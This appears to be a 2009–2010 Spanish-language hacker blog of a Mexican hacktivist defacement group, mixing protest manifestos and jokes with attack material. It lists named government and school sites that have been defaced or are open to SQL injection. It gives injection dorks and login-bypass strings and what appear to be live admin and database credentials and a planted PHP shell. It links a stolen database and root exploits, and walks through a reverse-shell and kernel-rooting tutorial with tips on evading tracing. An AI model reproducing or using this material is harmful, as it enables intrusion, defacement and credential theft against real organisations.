lunes, 20 de septiembre de 2010

Ciber Protesta Mexicana No Es Un Juego!!



Pues en estos ultimos dias me he dado cuenta que mucha gente anda queriendo agarrar fama, desprestigiar, etc, a la CPM, y por esto escribo lo siguiente de como es la cosa:

Inicie CPM con zeux0r, que al igual en ese momento se unieron gothic, klanx, tunich, nes0k el año pasado no como juego, ni para agarrar "fama" ni nada de esas tonterias, somos mexicanos (ciudadanos inconformes), que como muchos dicen "no que son personas sin que hacer..." NO señores, nosotros trabajamos, estudiamos, etc. y por lo mismo por que somos ciudadanos activos, vemos, sabemos y sentimos como nos tienen; "bien jodidos".

Nosotros no somos "HackerS", somos Mexicanos trabajadores y responsables de lo que nos rodea, tomamos voz, tenemos decisiones aceptables, Nosotros aprovechamos nuestros recursos para hacer sonar una protesta, que mal interpretada la toman como un ataque politico.

Desgraciadamente ni la politica, ni algunos medios se encargaran de limpiar nuestras palabras,y recuerden que CPM actualmente son:

Zer0 z0orG
Zeux0r
Gothic-X
Klanx
Tunich
Nes0k
Duff
Lan
Goliath
Zer0max
Nouter
N0nick
Klein
LastDragon
Wacko

---------------------------------------

Estas son tonterias de algunos ardidos:

De: Secretos México
Fecha: 19 de septiembre de 2010 20:43
Asunto: ME UNO A TU PROTESTA...
Para: blackhatter2010@yahoo.com.mx


TENGO MAS DE 150 PAGINAS LISTAS PARA DEFACER PORQUE ENTRO CON ' OR ''='

TE INTERESA!!!!??? SOLO NECESITO APRENDER MAS DEL DEFACE... PORQUE NO SE MUCHO....

www.youtube.com/ciberprotesta

---------------------------------------

jaja se burlan de sus propios errores? se burlan de no saber programar? se burlan de que con una simple sqli se biene abajo su puesto de ing. ?? jajaja y podria seguir pero en fin.

aaaaaa pero miren los inteligentes crearon un canal en youtube haciendose pasar por CPM y hasta enseñan a "hackear" jajaja.

www.youtube.com/ciberprotesta

señores primero aprendan a programar de jodido los sites por los cuales les pagan una muy linda suma de efectivo!!, despues aprendan un poco sobre ing. social, y ya despues matense! xD

lunes, 6 de septiembre de 2010

Ciber Protesta Mexicana

Inconformes con las dictaduras del gobierno, importantes Team's y sobresalientes apasionados de la de seguridad informática (en México) se aun unido por esta causa en común para una masiva manifestación cibernética.

info:

En un país en el que nuestros gobernantes, diputados y senadores piensan que somos ciegos, que somos sordos, que somos mudos, que esperamos pacientes con miedo, sin voluntad ni protesta alguna nosotros Mexicanos levantamos esta protesta cibernética pacifica y decimos...

Si vemos! Si escuchamos! Si hablamos, Si pensamos

, Hablamos y Actuamos... Escribimos...

... ¡No! más

Corrupción, Nepotismo, Abuso de Autoridad,

Ineptitud,

trafico de influencias, abuso de poder, Compadrísimo,
Malversación de fondos, Descaro,

Mentiras, Robos, Enriquecimiento ilícito,

Favoritismos, Hipocresía,

Partidos políticos inútiles, Asesinatos, Sobornos,

Pobreza , Lavado de dinero, Engaño,
Narcotráfico
, Ignorancia, Manipulación,

Injusticia, Cinismo,

Violencia, Secuestros Etc,etc,etc.

No Queremos un país donde:

Dónde la telefonía es controlada y monopolizada por una sola persona, recordemos que TELMEX era de los mexicanos y ahora es de uno solo, el más rico del mundo.
Dónde los funcionarios y servidores públicos tienen nexos con la mafia
Dónde los líderes sindicales hacen lo que mejor les conviene y pretender controlar al gobierno con manifestaciones y paros laborales
Dónde las empresas públicas como CFE y PEMEX se manejan como empresas familiares
Dónde la policía es corrupta, ineficiente y sin preparación

Lista de páginas hackeadas:

http://www.mexicosos.com.mx/

http://www.cofupro.org.mx

http://www.palenqueonline.com/

http://www.colima.gob.mx/

http://www.tuxtla.gob.mx/

http://www.casadelarchivo.gob.mx/

http://www.spm.org.mx/

http://convermex.com.mx/

http://www.laboratoriosjulio.com.mx/

http://www.parggon.com.mx/

http://www.colegiocervantesprimaria.edu.mx/

http://www.monitorapcj.com/

http://eldiariodechihuahua.com.mx/

http://www.arrobajuarez.com

http://www.lapuertanoticias.com

http://www.almargen.com.mx/

http://www.eldiariodedelicias.com.mx/

http://plataformafinancierajz.com/

http://www.regionlibre.com

http://flymissions.com/

http://www.hallofmetal.com/

http://www.sdr.gob.mx/

http://www.gruposaveres.com/

http://www.colorescreativos.com.mx/

http://www.lasarenasclub.org/

http://www.liconsa.gob.mx/

http://agendapublica.org/

http://www.panhgo.org.mx/

http://www.michoacan.gob.mx/

http://www.h24.com.mx/

http://juanmanuelpresidente2009.com/

http://ligadeunidadsocialista.org/

http://pulidodipan.org.mx/

http://babeldelnorte.com/

Cruz roja Mexicana Owned

Cruz Roja Owned XD

Bueno A.K.A XZITE miembro de Mteam defaceo cruz roja en protesta a la violencia.. por otra parte es increeible la velocidad con la que tracendio la noticia por las redes sociales lo que me deja varias ideas para una nueva forma de publicidad :P jajaja salu2 a la 'che MADELA jahjahjhahhahajhajha

http://www.cruzrojamexicana.org.mx

MALANDRINES.NET Internet Security Team Rulzzzzz Under MX yeaahhh

CMS Ecuatoriano Vuln[SQLi]

######################
*Script:
No se como se llame
Vuln: SQL Injection
######################
*Oficial Web:
http://www.xxx.com.ec
######################
*Author:
Zer0 z0orG
######################
*Dork:

inurl:"Titulos.php?Med="
######################
*Tabla:
usuario

*Columnas:
concat(usuario,0x3a,clave)
######################

BypassAdmin Uploader [CMS][phpshell[mailer][etc]

Tenemos un cms que no ocupa el logeo para subir archivos
asi que pues facil no?

Nombre cms: [Ni idea, le pondremos DKey que asi dice el titulo jaja.]

Version: [??]

Dork: [inurl:"/admin/descargas/"]

Found By: 0o_zeus_o0 && Zer0 z0orG

Happy uploads jaja

Nota: No se ocupa muxa explicacion y menos muxo conocimieto para subir una phpshell en un upload o si?

Greetz: Zeus, nesok, cereal, munder, poison, wer0x, komtec, mbyte, kaos, gothic, kanet, kikin, ricolino, pandrix, tunich, xianurin.

&&

DDLR, #RE, HSLTeam, MTeam

Confing de PGJE de bc



/ ************************* CONEXION A PGJE *********************************
$hostname = "localhost";
$database = "PGJE";
$username = "admin";
$password = "admin";


http://www.pgjebc.gob.mx

PD: Echenle coco =D

saludines

Isabelle Adjani

Pues viendo una movie me tope con esta personita que pff me hizo quedarme con la boca abierta jaja, esta muy wapa es una actriz y cantante francesa(segun wiki) xDD.

Aqui una pic de ella


ta wapa no?
saludines

Sedena.gob.mx Vuln a sql inj (Injection no terminada, terminala! xD)



Site Vuln:

http://www.sedena.gob.mx/imprimir.php?item=-1 union select 1,2

Como lo dice en l titulo no esta terminada la injeccion, por que? por que no pude xDD, me la pase unas horillas tirando a adivinar y nada de nada xD.

Posiblemente uds la completen en un 12x3 =P.

aaaaaaaaaaaaaaaaaaa ya que pongo esto tmb pongo este dork.

DORK: inurl:"imprimir.php?item="

saludines, ay me ponen en los gretz xDD

Otro CMS vuln =)



######################
*Script:
No se como se llame
Vuln: SQL Injection
######################
*Oficial Web:
http://www.sitios04.com.ar
######################
*Author:
Zer0 z0orG
######################
*Dork:

inurl:ampliar inurl:"?ati=" filetype:php
inurl:ampliar.php?ati=
######################
*Tabla:
usuario

*Columnas:
concat(usuario,0x3a,clave)
######################

DB de Cinemark

Pues asi es, aqui les traigo esta db jijiji

Descargala akii:

http://rapidshare.com/files/278527074/cinemark_Zer0-z0orG.diosdelared.com.zip

Saludines.

PD: si no saben k rayos es cinemark pueden ir a google y revisar =).

fls :: sac - Sistema de Administraciòn de Contenidos (Vulnerable shh xD)

Bueno pues este sistema creado por la agencia creativa flsikorski salio vulnerable a sql inj.

Se dirijen ala web de la agencia http://flsikorski.com

y se van al portafolio y listo tienen de donde escojer y creo que basta con decir que el sistema es vulnerable, ya todos saben buscar en que archivo(S) esta el error.

ejemplo:

http://www.tamazuladegordiano.gob.mx/admin/

USR: tamazula
PW: 24comunicacion82


saludines =)

AJAX File uploader de phpshell xDD



Bueno pues buscando que hacer en google me tope con este uploader que te uplodea todo d todo xDD

http://www.colmayorcauca.edu.co/~gama/ajaxfileuploader/

ahora solo cocinen el dork y pum k explote la bomba jajajaj xD

y pues ya de pilon pongo esta phpshell subida ay en el colegio mayor decauca =O.

http://www.colmayorcauca.edu.co/~gama/estigia/fotos/config.php

pass: www.diosdelared.com

ash no tenen imaginacion xD

y pues ya se van de directorio en directorio a llegar ala pagina del instituto...

http://www.colmayorcauca.edu.co/~gama/estigia/fotos/config.php?d=/var/www/cmc2009/


Si quieren dumpear las dbs pues aka estan los datos:

var $host = 'localhost';
var $user = 'root';
var $password = 'cmc17g05';

y eso es todo por hoy jejeje, espero le sirva a alguien como practica =P.

My Girlfriend...si como no xDD

Bueno pues aka ls dejo esa merga k hice k dejare en el prox owned k haga, con la img de mi novia adrina louvier jajaja si si claro...


Los emos de la ReD

Bueno aqui les dejo esta img con los nicks de algunos emos de la red, se k faltaton varios pero mi cabeza no da para mas ya es de madrugada y con sueñito, muxo sueñitoo0o0o.

Sin mas aqui los emos =P.




Saludines

[SQL Injection en asp](Viejisimo0o xD(pero fncional xD))

Bueno pes pa k doy explicaciones y esto y lo otro si al fin de cuentas solo van y buskan y ponen la injeccion y ya xD.

D0rks:
inurl:".net/administracion/" filetype:asp
inurl:".com/administracion/" filetype:asp
intitle:"admin area" filetype:asp
intitle:"administracion" filetype:asp
intitle:"control area" filetype:asp

Injeccion en el formulario:
' or ''='
' or 1=1
or 1=1--
"O 1 = 1 - --

y mas mas y mas etc xD.


bueno la verdad que pues ta facil no?
ay las dorks las cocinan a su gusto, salu2.

PD: No se kejen por post viejos k no se k poner xDD y lo new es priv8(cual priv8, si ya no tengo nada new, el trabajo absorbe my time jaja xDDD).

Insecure Cookie Handling

Bueno pues aqui les dejo este tuto que hizo el inyexion, que esta muy pero muy bueno =).

****************************************************************

#Explicación#

Insecure Cookie Handling (inseguridad en el manejo de cookies) esta vulnerabilidad la vemos cada ves mas en sitios de seguridad web(Seguridad en apps webs..), pero hay muchos que todavía no saben de que se trata, no saben como explotarla o no la entienden por diferentes motivos..., espero solventar las dudas que tengan con este tutorial.

Esta vulnerabilidad depende del perfil en la que la veamos puede parecer tonta o ingeniosa. Tonta diría por la forma en la que los programadores administran las cookies para restringir la sección de los usuarios no autorizados, e ingeniosa por la forma que los atacantes burlan la verificación...

Cookies: Las cookies forman parte del protocolo HTTP, este protocolo se usa para intercambiar mensajes entre el servidor y el cliente utilizando solicitudes y respuestas HTTP. El encabezado HTTP reservado para el uso de las cookies se denomina

Set-Cookie. Está compuesto por valores:

Set-Cookie: nombre=valor; domain=nombre de dominio; expires=vencimiento de la cookie; path=ruta donde la cookie sera validada; secure

Ejemplo:

Set-Cookie: admin=1; domain=www.web.com; expires=Friday, 2-Feb-2009 00:00:00 GMT; path=/; secure

Secure: Solo se usa si la cookie es enviada por conexion segura (SSL) y es opcional.

#Explotacion#

La explotación es muy fácil, creo que muchos ya se la están imaginando..., pondremos algunos ejemplos.


if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == 1)
{
echo "Bienvenido a la administración...";

}else{

echo "No estas autorizado";

}
?>


En este caso tendríamos que crear una cookie con el valor 1. Lo haremos en JavaScript pero se puede hacer con un plugin de Firefox o cualquier herramienta, el objetivo es crear la cookie. Entonces ingresaremos en el sitio y previamente ponemos en la barra del navegador...

javascript:document.cookie="admin=1; path=/";



Ahora entramos nuevamente al login y tendrás acceso a la administración en este caso...

Otro ejemplo:


if($_COOKIE['user'] == 1 && $_COOKIE['pass'] == 1)
{
echo "Autorizado";
}else{
echo "No autorizado";
}
?>

Como en el caso anterior entramos a la web e insertamos..

javascript:document.cookie="user=1; path=/"; document.cookie="pass=1; path=/";

Ahí creamos 2 cookies la cual sirven para pasar la verificación. Entramos nuevamente a la web siendo ya autorizado.

Vamos con el ultimo ejemplo:



$user = md5(base64_encode("admin"));

if($_COOKIE['usuario'] == $user && $_COOKIE['pass'] == 1)
{
echo "Administración";
}else{
echo "Acceso Incorrecto";
}
?>

Bueno hay que explicar unas cositas de este ejemplo, primero tenemos que saber como sacar el nombre del usuario para que posteriormente podamos encriptar primero en base64 y después en md5, como no somos magos como para adivinar el usuario tenemos que usar la lógica... bien puede ser un nombre de usuario por default (como admin, administrador etc..) o sino nos podemos fijar quien postea en la web, en la mayoria de los CMS dice el usuario que posteo. Supongamos que tiene como usuario "admin" (como el script de arriba) entonces encriptamos el usuario para que podamos crear la cookie con ese valor como muestro abajo:

javascript:document.cookie="usuario=db69fc039dcbd2962cb4d28f5891aae1; path=/"; document.cookie="pass=1; path=/";

Asi creando las cookies tendremos nuevamente acceso a la administracion...!

#Posibles Soluciones#

Podemos utilizar cookies pero manejarlas de la forma correcta para que no puedan bypassear la verificación, con manejarla de la forma correcta me refiero a que no hagan una verificacion estatica, que sea dinamica depende del administrador, ejemplo que en la cookie guarde un usuario(elejido por el admin previamente) y la contraseña codificadas, entre otras posibilidades...
Tambien podemos combinar verificaciones ejemplo cookies y sessiones, queda a imaginacion de uno de como armar la verificacion siempre y cuando este seguro que la verificación sea segura...


#Links#:

https://addons.mozilla.org/addon/3829 <-- Live HTTP Headers 0.14
https://addons.mozilla.org/es-ES/firefox/addon/573 <-- Add N Edit Cookies 0.2.1.3



Autor: InyeXion
Web: Www.inyexion.net - Www.inyexion.com.ar

**********************************************************

Fuentes:

Www.inyexion.net

http://docs.google.com/View?docid=dgvpd487_0gwzs8qwp

Encontrando Webshell (oldie xD)



Bueno ai unos Dork par buskar webshell en google, ya se que es viejisimo esto para algunos pero para otros puede ser nuevo no?...

Dork:
inurl:"c99shell.php"
intext:"c99shell r57shell nstview r57eng"
intext:"c99shell" file:"php"
intitle:"- c99shell" file:"php"

Con eso encontraras la c99 pero si cambias c99 por r57 u otro nombre de otra phpshell ayaras...espero les sirva.

salu2,
Zer0 z0orG

Tipos de Mujeres GEEKS!!

Mujer Virus:

Cuando menos lo esperas, se instala en tu vida y va apoderándose de todos tus espacios. Si intentas desinstalarla, vas a perder muchas cosas; si no lo intentas, pierdes todas.

Mujer Internet:

Hay que pagar para tener acceso a ella.

Mujer Servidor:

Siempre está ocupada cuando la necesitas.

Mujer Windows:

Sabes que tiene muchos fallos, pero no puedes vivir sin ella.

Mujer Macintosh:

Preciosa, infalible y algo cara, no muy compatible con otras… y solo el 5% de los hombres saben la dicha de tenerlas.

Mujer PowerPoint:

Ideal para presentarlas a la gente en fiestas, convenciones, etcétera.

Mujer Excel:

Dicen que hace muchas cosas, pero tú tan solo la utilizas para las operaciones básicas.

Mujer Word:

Aunque todos creen saber todo de ella, siempre tienen una sorpresa reservada de algo que desconocías puede hacer.

Mujer D.O.S.:

Todos la tuvieron algún día, pero nadie la quiere ahora.

Mujer Backup:

Tú crees que tiene lo suficiente, pero a la mera hora, siempre le falta algo.

Mujer Scandisk:

Sabemos que es buena y que sólo quiere ayudar, pero en el fondo nadie sabe lo que realmente está haciendo.

Mujer Screensaver:

No sirve para nada, pero te divierte mucho.

Mujer RAM:

Aquella que olvida todo apenas se desconecta.

Mujer Disco Duro:

Aquella que se acuerda de todo, todo el tiempo.

Mujer Mouse:

Funciona sólo cuando la arrastras.

Mujer Multimedia:

Hace que todo parezca bonito.

Mujer Usuario:

No hace nada bien y siempre esta haciendo preguntas.

Mujer e-Mail:

de cada diez cosas que dice nueve son tonterías

Mujer USB:

traslada información de un lugar a otro….popularmente se conoce como chismosa.

jaja esta mamda la sake del blog del buen Klanx

Comentarios: 0 | Leer comentarios

[x] Conectando Linksys con 2wire para inet inalambrico(puentesin)

Publicado el 05/08/2009 12:08:00 en Hacking Wireless. Total de votos: 1 Votar

Bueno pues compre un router linksys para tener salida a inet inalambrico
ya que mi 2wire pues es alambrico(logico no? si no para que compraba el linksys xDD)
bueno pues todos los que me conocen saben que soy sincero y no soy
de los que se la tiran de que saben todo y esto y lo otro, asi que
la verdad que de redes ya si pues se pura madre jajaj osea se nada.

Entonses no pues muy feliz compre mi linksys y dije y ahora como merga lo conecto?
no pues se me hizo facil conectar el cable ethernet que va del 2wire al pc, pues conectarlo
al linksys y del linksys al pc, que es lo que hice por logica, pero ptm que paso?
pues que no tenia internet jajaja dije esto no sirve, asi que me fui a google
y buscar como merga configurar e 2wire con el linksys para tener salida al inet.

No pues hice circo, maroma y teatro y nada me funciono y me pase casi
24hrs buscando y probando y nada, asi que recurri a preguntar, y pues me salio lo mismo
no me funcionaba lo que me decian.

Que en si en todos lados dicen que ay que configurar el 2wire que ay que modificar
no recuerdo que y no se que mas, puros royotes que al final ni me sirvieron jaja.

y pues ya durmiendo, soñaba con la respuesta ya que komtec1 me dijo
que necesitaba cambiar en el 2wire a ip basica algo asi, ya que tanto el 2wire como el linksys
pues abren con 192.168.1.x, entons tmb cambie eso y no funciono.

Bueno me quede en que soñando, segun yo conectaba todo y solo le movia al linksys
y listo ya tenia internet, pues ya que me levanto hice lo que en el sueño y zaz jaja que si
sirve, bueno lo que hice es primero que nada reiniciar tanto el 2wire como el linksys
a como venian por que en todos lados dicen que ay que cambiar que el user, la pass y no se que
no pues no se necesita ni tocar el 2wire jajaja.

Bueno ya conte mi historia huajira o como se escriba ahora si pongo como lo hiice y asi es como
me funciono =P.

-Conectar el cable ethernet que va del 2wire al pc, conectarlo al linksys
-Conectar otro cable ethernet del pc al linksys(claro asi quedaria el pc con inet alambrico y tu lap con inalambrico como yop =P).
-Reiniciar o checar que tanto el 2wire como el linksys esten con la configuracion predefinida.
-Entrar al linksys (192.168.1.x) y cambiar la ip que esta al lado del parentesis (Device IP Address)
que por ejemplo conmigo era 192.168.1.1 y lo cambian a 192.168.2.1.
-Esperamos a que se haga el cambio y listo ya tendremos inet inalambrico.

Y sin tener que modificar el 2wire ni nada de nada.
bueno la verdad que no se si estoy bien o mal ya que yo no se de este pex
pero rebien que me ha servido jaja.

y la conclusion del dia es:

Haganle caso a sus sueños xDD.

saludines

Conectando Linksys con 2wire para inet inalambrico(puentesin)

Bueno pues compre un router linksys para tener salida a inet inalambrico
ya que mi 2wire pues es alambrico(logico no? si no para que compraba el linksys xDD)
bueno pues todos los que me conocen saben que soy sincero y no soy
de los que se la tiran de que saben todo y esto y lo otro, asi que
la verdad que de redes ya si pues se pura madre jajaj osea se nada.

Entonses no pues muy feliz compre mi linksys y dije y ahora como merga lo conecto?
no pues se me hizo facil conectar el cable ethernet que va del 2wire al pc, pues conectarlo
al linksys y del linksys al pc, que es lo que hice por logica, pero ptm que paso?
pues que no tenia internet jajaja dije esto no sirve, asi que me fui a google
y buscar como merga configurar e 2wire con el linksys para tener salida al inet.

No pues hice circo, maroma y teatro y nada me funciono y me pase casi
24hrs buscando y probando y nada, asi que recurri a preguntar, y pues me salio lo mismo
no me funcionaba lo que me decian.

Que en si en todos lados dicen que ay que configurar el 2wire que ay que modificar
no recuerdo que y no se que mas, puros royotes que al final ni me sirvieron jaja.

y pues ya durmiendo, soñaba con la respuesta ya que komtec1 me dijo
que necesitaba cambiar en el 2wire a ip basica algo asi, ya que tanto el 2wire como el linksys
pues abren con 192.168.1.x, entons tmb cambie eso y no funciono.

Bueno me quede en que soñando, segun yo conectaba todo y solo le movia al linksys
y listo ya tenia internet, pues ya que me levanto hice lo que en el sueño y zaz jaja que si
sirve, bueno lo que hice es primero que nada reiniciar tanto el 2wire como el linksys
a como venian por que en todos lados dicen que ay que cambiar que el user, la pass y no se que
no pues no se necesita ni tocar el 2wire jajaja.

Bueno ya conte mi historia huajira o como se escriba ahora si pongo como lo hiice y asi es como
me funciono =P.

-Conectar el cable ethernet que va del 2wire al pc, conectarlo al linksys
-Conectar otro cable ethernet del pc al linksys(claro asi quedaria el pc con inet alambrico y tu lap con inalambrico como yop =P).
-Reiniciar o checar que tanto el 2wire como el linksys esten con la configuracion predefinida.
-Entrar al linksys (192.168.1.x) y cambiar la ip que esta al lado del parentesis (Device IP Address)
que por ejemplo conmigo era 192.168.1.1 y lo cambian a 192.168.2.1.
-Esperamos a que se haga el cambio y listo ya tendremos inet inalambrico.

Y sin tener que modificar el 2wire ni nada de nada.
bueno la verdad que no se si estoy bien o mal ya que yo no se de este pex
pero rebien que me ha servido jaja.

y la conclusion del dia es:

Haganle caso a sus sueños xDD.

saludines

Reportes a Sitios Web



Pues como siempre dicen "Avisen" de la vulnerabilidad y no hagan el deface, aqui una prueba que siempre reporto y ni un gracias y ni hacen caso xD.

Pero ta weno xD, aqui dejo 2 de no se cuantos reportes que he hecho.

http://informaticaxd.com.ar/PDF/JAPAMI.pdf

http://informaticaxd.com.ar/PDF/ISA.pdf

Aproximadamente de 10 webs que se les envia el reporte,
2 dan las gracias y 1 repara xDD

Saludos, Zerit0 =)

domingo, 5 de septiembre de 2010

Local Root Exploits Compilados

Bueno pues aqui pongo los root exploit que pidieron en el shoutbox.

http://images.tblog.com/user_images/1213841656_kinghavoc.gif

Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit

http://milw0rm.com/exploits/5092

Descarga:

http://www.fileden.com/getfile.php?file_path=http://www.fileden.com/files/2008/1/15/1701407/vmsplice_zer0-z0org


Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit

http://milw0rm.com/exploits/5093

Descarga:

http://www.fileden.com/getfile.php?file_path=http://www.fileden.com/files/2008/1/15/1701407/vmsplice2_zer0-z0org

Paginas Mexicanas Vulnerables

Si ps Si, creo que google nos daria el primer lugar en paginas vulnerables y lo peor que las paginas mas vulnerables que ay son las del gobierno...

Cuanto no les pagan a los webmasters y aun asi salen con jaladas pero en fin.
Este post lo abro ya que ire poniendo aqui algunas paginas que tienen buenas visitas y que son vulnerables y claro webs mexicanas xDD.

Lista de Paginas Vulnerables:

.Gob

-http://www.saludqr.gob.mx :: SQL Injection
-http://www.chimalhuacan.gob.mx :: SQL Injection
-http://www.ifp.pgjdf.gob.mx :: SQL Injection
-http://www.pgjebc.gob.mx :: SQL Injection
-http://www.pgj.col.gob.mx :: SQL Injection
-http://www.pjeveracruz.gob.mx :: SQL Injection
-http://www.poderjudicialchiapas.gob.mx :: SQL Injection
-http://www.sdr.gob.mx :: SQL Injection
-http://www.irapuato.gob.mx :: SQL Injection
-http://www.congresoson.gob.mx :: SQL Injection
-http://www.difslp.gob.mx :: SQL Injection
-http://www.sanluis.gob.mx :: SQL Injection
-http://www.huachinera.gob.mx :: SQL Injection
-http://www.mazatlan.gob.mx :: SQL Injection
-http://www.sonoyta.gob.mx :: SQL Injection
-http://www.santaana.gob.mx :: SQL Injection
-http://www.incodis.col.gob.mx :: SQL Injection
-http://www.congresopuebla.gob.mx :: SQL Injection
-http://www.sopnay.gob.mx :: SQL Injection
-http://www.magdalenasonora.gob.mx :: SQL Injection
-http://www.imuris.gob.mx :: SQL Injection
-http://www.tepache.gob.mx :: SQL Injection
-http://www.infraestructura.chiapas.gob.mx :: SQL Injection
-http://www.ocotlan.gob.mx :: SQL Injection
-http://www.congresochiapas.gob.mx :: SQL Injection
-http://www.benitojuarezsonora.gob.mx :: SQL Injection
-http://www.isc.gob.mx :: SQL Injection
-http://www.tamazuladegordiano.gob.mx :: SQL Injection
-http://www.lapaz.gob.mx :: SQL Injection
-http://www.juarez.gob.mx :: SQL Injection
-http://www.comala.gob.mx :: SQL Injection
-http://www.ures.gob.mx :: SQL Injection
-http://www.opodepe.gob.mx :: SQL Injection
-http://www.arizpe.gob.mx :: SQL Injection
-http://www.nogalessonora.gob.mx :: SQL Injection
-http://www.secver.gob.mx :: SQL Injection
-http://www.naucalpan.gob.mx :: SQL Injection
-http://www.tepic.gob.mx :: SQL Injection
-http://multimedia.calderon.presidencia.gob.mx :: SQL Injection
-http://tv4.guanajuato.gob.mx :: SQL Injection
-http://www.stacatarina.gob.mx :: SQL Injection
-http://www.pjedomex.gob.mx :: SQL Injection

.Org

-http://www.transparenciasonora.org.mx :: SQL Injection
-http://www.cdhdf.org.mx :: SQL Injection
-http://www.partidodeltrabajo.org.mx :: SQL Injection
-http://www.cinit.org.mx :: SQL Injection
-http://www.ctm.org.mx :: SQL Injection
-http://www.aprenem.org.mx :: SQL Injection
-http://www.feuan.org.mx :: SQL Injection
-http://arquitectosinah.org.mx :: SQL Injection
-http://www.ampei.org.mx :: SQL Injection
-http://www.mucd.org.mx :: SQL Injection
-http://www.msmg.org.mx :: SQL Injection

,Edu

-http://www.uaeh.edu.mx :: SQL Injection
-http://www.uad.edu.mx :: SQL Injection
-http://www.normalsuperiordetamaulipas.edu.mx :: SQL Injection
-http://www.becquer.edu.mx :: SQL Injection
-http://www.junipero.edu.mx :: SQL Injection
-http://www.cobaqroo.edu.mx :: SQL Injection
-http://www.eldp.edu.mx :: SQL Injection

.Famosos

-http://eugenioderbez.com.mx :: SQL Injection (El script de esta web es usado en varias webs asi que todas son vulns xD)
-http://facundo.com.mx :: SQL Injection

Actualizado 18/04/09 12:06pm

AIO - Intrusion Z

Este AIO tiene como base el poder hacer una auditoria web facilmente desde el lugar donde estemos, tiene cosas sencillas como:

Tools:

-Intellitamper
-Netcat
-IR4DEXShell
-C40
-Data Chaos
-Multi MD5 Crack
-Pack de RootExploits

Tutos:

-RFI
-LFI
-CSRF/XSRF
-SQL Injection
-Como encontrar bugs en php
-Como lograr ser root en un server

Datos:

-Iframe
-Redireccion
-Bypass
-Tablas

Imagen:



Link de Descarga:
http://rapidshare.com/files/207609316/Intrusion_Z_www.zer0-z0org.com.zip

AIO - Deface :: DiosdelaRed Version =P

Bueno este aio lo hice hace poco especialmente para el foro, www.diosdelared.com.
y gracias a las peticiones hacia este aio, lo eh resubido =).









Descarga:
http://www.fileden.com/files/2008/1/15/1701407/AIO%20-%20DEFACE%20V1.1_www.zer0-z0org.com.zip

Como rootear? :: Easy Tutorial By Zer0 z0orG

Bueno Primero necesitamos tener lo siguiente:

* 1 phpshell (r57, c99, c40, etc).
* 1 Backshell ejemplo la datacha0s.
* Netcat
* Suficientes permisos para subiry ejecutar xD.

Ya suponiendo que tenemos la phpshell en x web donde queremos ser root del server, nos fijamos en la version del kernel, despues nos vemos a milw0rm o a google y buscamos el local root exploit para la version del kernel y ya obteniendo el local root exploit lo subimos junto con la backshell a la web a travez de la phpshell.

Ahora vamos a poner ala escucha el puerto donde queremos que se conecte el server a nuestra pc.
como?
Nos vamos a inicio/ejecutar/cmd y despues en la consola nos vamos a donde tenemos netcat,
ejemplo si lo pusimos en c: hacemos lo siguiente:
C:\Documents and Settings\Administrador>cd..
C:\Documents and Settings>cd..
C:\>
Luego tecleamos nc -lvvp puerto que queramos... ejemplo: nc -lvvp 21
C:\>nc -lvvp 21
listening on [any] 21 ...
Ok ya esta ala escucha el puerto 21.

Nos vamos ala phpshell y ejecutamos la backshell para que se conectarnos a nuestra pc:
perl nombredelabackshell.pl tuip puerto que pusimos ala escucha...ejemplo:
perl dc.pl 127.0.0.1 21

Y nos dira lo siguiente:
Data Cha0s Connect Back Backdoor

[*] Dumping Arguments
[*] Connecting...
[*] Spawning Shell
[*] Datached

Ahora vamos a netcat y vemos si en realidad conecto, en caso que aya conectado aparecera lo siguiente, ejemplo:
connect to [127.0.0.1] xweb.com [127.0.0.1] 57566

y en caso de que no conecte seguira apareciendo:
listening on [any] 21 ...

De lo contrario ya estaremos conectados al server desde nuestra pc.

Ahora compilaremos el local root exploit, en netcat tecleamos lo siguiente:

gcc nombre del local root exploit -o nombre del binario

ejemplo:
gcc bad.c -o bad

Despues le daremos permisos de lectura, escritura y ejecucion, de la siguiente manera:

chmod -c 777 bad

Luego ejecutamos el binario, asi:
./bad

ahora si todo salio bien y es vulnerable el kernel

al final de lo que nos diga la backshell ejecutada nos dira lo siguiente:

uid=0(root) gid=0(root) groups=48(apache)

y listo ya tenemos uid(0) de root =).

Nota: Espero sea entendible y luego subo imagenes.

Nota2: Checa con la phpshell que puertos tiene abiertos el server, para asi escojer alguno para conectar.

Nota3: si lo copias y lo pegas en otro lado no olvides su autor osease yo Zer0 z0orG xDD.

Rooteando y Owneando By Zer0 z0orG :: Ir4Dex Group

Rooteando y Owneando
====================

Autor: Zer0 z0orG

--------------------

++++++ Indice ++++++

--------------------

1. Introducción
2. Ocultarse
3. Penetrar (mal pensados xD)
4. Encontrar panel de administracion
5. Subiendo phpshell
6. Rooteando
7. Mass Defecement
8. Agradecimientos
9. Contacto
0. Good Bye

-------------------------

+++++ Introducción ++++++

-------------------------

Que onda!!
En este texto ire explicando como entrar a una web de diferentes formas,
y despues como conseguir privilegios de root y como hacer un mass defacement.
todas las herramientas que se vayan a ocupar estaran al final del tutorial
para su descarga.

-------------------------

+++++++ Ocultarse +++++++

-------------------------

[ Opcion 1 - Modify Headers ]

Bueno pues primero que nada ay que ocultarnos lo mas que podamos asi que para ello
necesitaremos el addon de mozilla firefox llamado "modify headers" este incluido
en el rar que estara linkeado al final del tutorial. Modify headers como su nombre
lo indica modifica las cabeceras pareciendo como si otra ip sea la que visite la web.

Al instalar este addon iremos ala barra de herramientas de firefox y vamos a herramientas
luego abajo biene la pestaña de modify headers, damos click y se abre una ventana
en el rectangulo superior izquierdo nos da a escojer Add, Modify, Filter, escojeremos
"Modify", en el rectangulo superior enmedio pondremos lo siguiente "X-Forwarded-For" y en
el rectangulo superior derecho pondremos la ip que nos venga en gana ejemplo: "127.0.0.1".

Ahora vemos que dentro de la ventana de modify headers viene una pestaña llamada configuration
damos click y palomeamos la opcion que dice Always On, para asi cerrar la ventana y que siga
activo.

[ Opcion 2 - Tor ]

Instalaremos Tor, tambien vendra junto al rar. Ok ya instalado abrimos nuestro navegador firefox
y vamos a opciones y clickeamos en la pestaña "Avanzado" ya elegida esta pstaña vamos ala
pestaña debajo que dice "Red" y ahora clickeamos en la pestaña configuración... y ahora
elejimos la opcion que dice "configuracion manual del proxy" como estamos haciendo esto despues
de haber instalado tor ya estara configurado, y ya pues aceptar y listo andaremos anonimos.
Si quieres desactivar tor en la parte inferior derecha del navegador dice Tor Activado/Tor Desactivado
al dar click lo activamos o viceversa.

[ Opcion 3 - Las Dos ]

